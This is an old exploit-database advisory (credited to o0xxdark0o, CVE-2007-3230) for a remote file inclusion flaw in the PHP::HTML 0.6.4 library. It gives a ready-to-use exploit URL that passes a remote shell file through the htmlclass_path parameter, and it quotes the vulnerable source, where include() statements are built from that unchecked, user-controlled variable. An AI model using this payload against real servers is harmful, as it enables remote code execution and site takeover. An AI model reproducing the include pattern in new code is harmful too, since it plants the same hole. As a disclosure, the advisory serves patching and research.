PHP::HTML 0.6.4 - 'PHPhtml.php' Remote File Inclusion

Author: o0xxdark0o
type: webapps
platform: php
port: 
date_added: 2007-06-13 
date_updated: 2016-10-05 
verified: 1 
codes: OSVDB-36304;CVE-2007-3230 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphphtml-0.6.4.tar.gz

phphtml
v 0.6.4
FOUND BY : o0xxdark0o
Website: http://www.sitellite.org/
DOWNLOAD : http://sourceforge.net/projects/phphtml
REMOTE FILE INCLUDE
############################################################
FILE :
PATH\phphtml.php
############################################################
EXP:
xxx.com\path\phphtml.php?htmlclass_path=SH3ll.txt?
############################################################
CODE: on line 19
<?

define (PHPHTML_VERSION, "0.6.4");

/* gettext is not implemented for now*/
$use_gettext=0;

/* We need to know where the PHP::HTML tree is installed.*/

if (strlen(chop($htmlclass_path))==0) $htmlclass_path=".";
if ($use_gettext==1)
{
   if (function_exists("gettext"))
   {
       $gettext_enable=1;
   }
}

include("$htmlclass_path/ext.php");  /* Some extenstions to PHP */
include("$htmlclass_path/core.php");  /* PHP::HTML Core */
include("$htmlclass_path/xhtml.php");  /* XHTML extensions */
include("$htmlclass_path/xhtml_table.php");  /* XHTML tables extensions */
include("$htmlclass_path/xhtml_forms.php");  /* XHTML forms extensions */
include("$htmlclass_path/xhtml_doc.php");  /* XHTML document extension */
include("$htmlclass_path/wml.php");  /* WML extension */


/* Below is a debugging example */

/*
$t=new XHTML_doc("Hello");
echo $t->render();
*/


############################################################
thanks for all my friends.. str0ke  .... oxdo .... cold z3ro
www.hach-teach.org - www.3asfh.com
############################################################
BY : o0xxdark0o
     o0xxdark0o@msn.com

# milw0rm.com [2007-06-14]